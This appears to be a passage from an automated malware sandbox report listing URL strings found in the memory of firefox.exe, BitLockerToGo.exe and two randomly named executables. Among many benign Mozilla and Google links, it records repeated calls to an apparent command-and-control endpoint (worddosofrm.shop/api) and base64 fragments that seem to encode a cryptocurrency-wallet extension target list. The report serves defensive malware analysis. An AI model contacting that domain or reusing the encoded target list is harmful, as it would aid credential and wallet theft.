Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2849549835.0000028C973E0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2927574543.0000028CA325D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: BitLockerToGo.exe, 00000015.00000003.2769151966.000000000519D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 0000001A.00000002.2883449828.0000028C9CC21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsMediaPlatformDecoderNotFound
Source: firefox.exe, 0000001A.00000002.2883449828.0000028C9CC21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsMediaWMFNeeded
Source: BitLockerToGo.exe, 00000015.00000003.2769151966.000000000519D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: 0d287ea527.exe, 00000009.00000003.2564913479.000000000520C000.00000004.00000800.00020000.00000000.sdmp, c4df60870c.exe, 0000000A.00000002.2959179677.0000000000256000.00000040.00000001.01000000.0000000B.sdmp, c4df60870c.exe, 0000000A.00000003.2801343733.000000001D781000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2721920600.0000000005909000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2721707943.0000000005910000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2722844496.0000000004FCE000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2723105175.0000000004FC7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: 0d287ea527.exe, 00000012.00000003.2721920600.00000000058E4000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2723105175.0000000004FA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: 0d287ea527.exe, 00000009.00000003.2564913479.000000000520C000.00000004.00000800.00020000.00000000.sdmp, c4df60870c.exe, 0000000A.00000002.2959179677.0000000000256000.00000040.00000001.01000000.0000000B.sdmp, c4df60870c.exe, 0000000A.00000003.2801343733.000000001D781000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2721920600.0000000005909000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2721707943.0000000005910000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2722844496.0000000004FCE000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2723105175.0000000004FC7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: 0d287ea527.exe, 00000012.00000003.2721920600.00000000058E4000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2723105175.0000000004FA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: c4df60870c.exe, 0000000A.00000002.2959179677.0000000000256000.00000040.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WdsYWhtbmRlZHwxfDB8MHxab2hvIF
Source: c4df60870c.exe, 0000000A.00000002.2959179677.0000000000256000.00000040.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm
Source: firefox.exe, 0000001A.00000003.2799161819.0000028CA3172000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tc39.github.io/ecma262/#sec-typeof-operator
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://token.services.mozilla.com/1.0/sync/1.5
Source: firefox.exe, 0000001A.00000002.2883449828.0000028C9CC21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2
Source: firefox.exe, 0000001A.00000002.2883449828.0000028C9CC21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-3.1
Source: firefox.exe, 0000001A.00000002.2883449828.0000028C9CC21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4
Source: firefox.exe, 0000001A.00000002.2883449828.0000028C9CC21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc7515#appendix-C)
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://topsites.services.mozilla.com/cid/
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://tracking-protection-issues.herokuapp.com/new
Source: firefox.exe, 0000001A.00000002.2846282370.0000028C96AF5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2863474387.0000028C992E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://truecolors.firefox.com
Source: firefox.exe, 0000001A.00000002.2863474387.0000028C992A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C973E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://vk.com/
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-%CHANNEL%-browser&utm_campaig
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://webcompat.com/issues/new
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://webextensions.settings.services.mozilla.com/v1
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C97326000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://webpack.js.org/concepts/mode/)
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C973E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://weibo.com/
Source: firefox.exe, 0000001A.00000003.2799161819.0000028CA3172000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2797063483.0000028CA3173000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://wicg.github.io/construct-stylesheets/#using-constructed-stylesheets).
Source: BitLockerToGo.exe, 00000015.00000003.2921888267.0000000002AE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://worddosofrm.shop/
Source: BitLockerToGo.exe, 00000015.00000003.2764623979.0000000002B6B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2763603121.0000000002B6A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2771042618.0000000002B6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://worddosofrm.shop/-
Source: BitLockerToGo.exe, 00000015.00000003.2816159407.0000000002AE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://worddosofrm.shop/CoN
Source: BitLockerToGo.exe, 00000015.00000003.2927336825.0000000002AE6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2921888267.0000000002AE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://worddosofrm.shop/Y
Source: BitLockerToGo.exe, 00000015.00000003.2921888267.0000000002AE2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2921888267.0000000002ABD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://worddosofrm.shop/api
Source: BitLockerToGo.exe, 00000015.00000003.2927336825.0000000002AE6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2921888267.0000000002AE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://worddosofrm.shop/api8&=c
Source: BitLockerToGo.exe, 00000015.00000003.2920445413.0000000002B5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://worddosofrm.shop/apiL
Source: BitLockerToGo.exe, 00000015.00000003.2865305089.0000000002B5F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2855995666.0000000002B5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://worddosofrm.shop/apibu
Source: BitLockerToGo.exe, 00000015.00000003.2927336825.0000000002AE6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2921888267.0000000002AE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://worddosofrm.shop/h
Source: BitLockerToGo.exe, 00000015.00000003.2896788902.0000000004F7B000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2926073027.0000000004F7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://worddosofrm.shop/k
Source: BitLockerToGo.exe, 00000015.00000003.2927336825.0000000002AE6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2921888267.0000000002AE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://worddosofrm.shop/t0
Source: BitLockerToGo.exe, 00000015.00000003.2896788902.0000000004F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://worddosofrm.shop:443/api
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C973E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.aliexpress.com/
Source: c4df60870c.exe, 0000000A.00000002.3014279313.0000000023871000.00000004.00000020.00020000.00000000.sdmp, c4df60870c.exe, 0000000A.00000002.2974865414.0000000001181000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2789702057.00000000058B8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2855995666.0000000002B69000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2815618806.0000000002B69000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2831854359.0000000002B69000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2814519497.0000000002B69000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2865305089.0000000002B69000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2920445413.0000000002B69000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2863474387.0000028C992A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C97326000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2715980139.0000028C9AE5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C9737C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/https://bugzilla.mozilla.org/show_bug.cgi?id=1616
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C973E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.avito.ru/
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C973E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.baidu.com/
Source: 0d287ea527.exe, 00000009.00000003.2544686879.000000000075C000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000009.00000003.2544718457.0000000000706000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000009.00000003.2544883068.0000000000716000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2706092169.0000000001106000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2705148436.0000000001153000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2706721478.000000000110D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: 0d287ea527.exe, 00000009.00000003.2544718457.0000000000706000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000009.00000003.2544883068.0000000000716000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-manage
Source: 0d287ea527.exe, 00000012.00000003.2706092169.0000000001106000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2706721478.000000000110D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-manage?
Source: 0d287ea527.exe, 00000009.00000003.2544686879.000000000075C000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2705148436.0000000001153000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C973E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ctrip.com/
Source: 0d287ea527.exe, 00000009.00000003.2565798441.00000000051CA000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000009.00000003.2565425414.00000000051DF000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000009.00000003.2565653231.00000000051CA000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2722580253.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2723873605.0000000004FB9000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2723631868.0000000004FBB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2724193570.0000000004FB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: c4df60870c.exe, 0000000A.00000002.3014279313.0000000023871000.00000004.00000020.00020000.00000000.sdmp, c4df60870c.exe, 0000000A.00000002.2974865414.0000000001181000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2789702057.00000000058B8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2771042618.0000000002B6A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2863474387.0000028C992A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: firefox.exe, 0000001A.00000003.2806432315.0000028CA335A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2849549835.0000028C973E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/search
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C9737C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2713884695.0000028C9AE1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2715980139.0000028C9AE5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: 0d287ea527.exe, 00000009.00000003.2565798441.00000000051CA000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000009.00000003.2565425414.00000000051DF000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000009.00000003.2565653231.00000000051CA000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2722580253.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2723873605.0000000004FB9000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2723631868.0000000004FBB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2724193570.0000000004FB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C97326000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2715980139.0000028C9AE5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C9737C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/searchhttps://ac.duckduckgo.com/ac/principalToInherit_base64query=
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/geolocation/v1/geolocate?key=%GOOGLE_LOCATION_SERVICE_API_KEY%
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C973E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ifeng.com/
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C973E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.iqiyi.com/
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C973E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.iqiyi.com/https://vk.com/
Source: firefox.exe, 0000001A.00000002.2933198814.0000053F85E04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2835689525.000000D6B4B7B000.00000004.00000010.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2863474387.0000028C99233000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/about/legal/terms/subscription-services/
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/releasenotes/?utm_source=firefox-browser&utm_medi
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/tour/
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/geolocation/
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/new?reason=manual-update
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/notes
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/xr/
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/privacy/subscription-services/
Source: c4df60870c.exe, 0000000A.00000002.2959179677.0000000000284000.00000040.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: BitLockerToGo.exe, 00000015.00000003.2769151966.000000000519D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: c4df60870c.exe, 0000000A.00000002.2959179677.0000000000284000.00000040.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: BitLockerToGo.exe, 00000015.00000003.2769151966.000000000519D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: c4df60870c.exe, 0000000A.00000002.2959179677.0000000000256000.00000040.00000001.01000000.0000000B.sdmp, c4df60870c.exe, 0000000A.00000002.2959179677.0000000000284000.00000040.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: 0d287ea527.exe, 00000009.00000003.2596872097.00000000052D5000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2771900663.00000000059DA000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2769151966.000000000519D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: BitLockerToGo.exe, 00000015.00000003.2769151966.000000000519D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/android/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/ios/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campa
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#crash-reporter
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#health-report
Source: c4df60870c.exe, 0000000A.00000002.2959179677.0000000000256000.00000040.00000001.01000000.0000000B.sdmp, c4df60870c.exe, 0000000A.00000002.2959179677.0000000000284000.00000040.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 0000001A.00000002.2863474387.0000028C992A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: c4df60870c.exe, 0000000A.00000002.2959179677.0000000000256000.00000040.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/d=enterpk2016&ui=en-us&rs=en-us&ad=us
Source: 0d287ea527.exe, 00000009.00000003.2596872097.00000000052D5000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2771900663.00000000059DA000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2769151966.000000000519D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: c4df60870c.exe, 0000000A.00000002.2959179677.0000000000256000.00000040.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/vRm9ybXxwbmxjY21vamNtZW9obHBnZ21mbmJiaWFwa21ibGlvYnwxfDB8MHx
Source: firefox.exe, 0000001A.00000002.2835689525.000000D6B4B7B000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.orgo
Source: firefox.exe, 0000001A.00000002.2884703213.0000028C9CD4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com
Source: firefox.exe, 0000001A.00000002.2934782130.00002F7FAD103000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.comZ
Source: firefox.exe, 0000001A.00000002.2863474387.0000028C992A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.reddit.com/
Source: firefox.exe, 0000001A.00000002.2934782130.00002F7FAD103000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.tsn.ca
Source: firefox.exe, 0000001A.00000002.2863474387.0000028C992A7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2863474387.0000028C992E4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2863474387.0000028C99272000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C973E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.zhihu.com/
Source: firefox.exe, 0000001A.00000002.2883449828.0000028C9CC21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warning
Source: firefox.exe, 0000001A.00000002.2848761105.0000028C9723E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com
Source: firefox.exe, 0000001A.00000002.2908273468.0000028C9E7EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/
Source: firefox.exe, 0000001A.00000002.2908273468.0000028C9E7EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/P.
Source: firefox.exe, 0000001A.00000002.2908273468.0000028C9E7DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2863474387.0000028C99233000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 00000018.00000002.2666361196.000002216800A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2687361905.00000233A96D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C9737C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwddedupeLogins:
Source: firefox.exe, 0000001A.00000002.2934782130.00002F7FAD103000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.coming
Source: firefox.exe, 0000001A.00000002.2934782130.00002F7FAD103000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.comingZ

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown	Network traffic detected: HTTP traffic on port 60575 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
